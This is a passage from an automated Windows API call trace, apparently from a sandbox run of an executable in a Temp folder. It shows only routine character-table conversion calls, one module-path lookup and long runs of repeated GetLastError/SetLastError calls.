6\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xe3\x30\xb1\xa9\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0108.148] GetLastError () returned 0x6 [0108.148] SetLastError (dwErrCode=0x6) [0108.148] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0108.148] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ꧄ശAĀ") returned 256 [0108.148] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ꧄ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0108.148] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ꧄ശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0108.149] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\xe3\x30\xb1\xa9\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0108.149] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe")) returned 0x30 [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.149] GetLastError () returned 0x0 [0108.149] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.150] SetLastError (dwErrCode=0x0) [0108.150] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.151] SetLastError (dwErrCode=0x0) [0108.151] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.152] SetLastError (dwErrCode=0x0) [0108.152] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.153] SetLastError (dwErrCode=0x0) [0108.153] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.154] GetLastError () returned 0x0 [0108.154] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.155] SetLastError (dwErrCode=0x0) [0108.155] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.156] SetLastError (dwErrCode=0x0) [0108.156] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.157] SetLastError (dwErrCode=0x0) [0108.157] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.158] SetLastError (dwErrCode=0x0) [0108.158] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.159] SetLastError (dwErrCode=0x0) [0108.159] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.160] SetLastError (dwErrCode=0x0) [0108.160] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.161] SetLastError (dwErrCode=0x0) [0108.161] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError (dwErrCode=0x0) [0108.162] GetLastError () returned 0x0 [0108.162] SetLastError 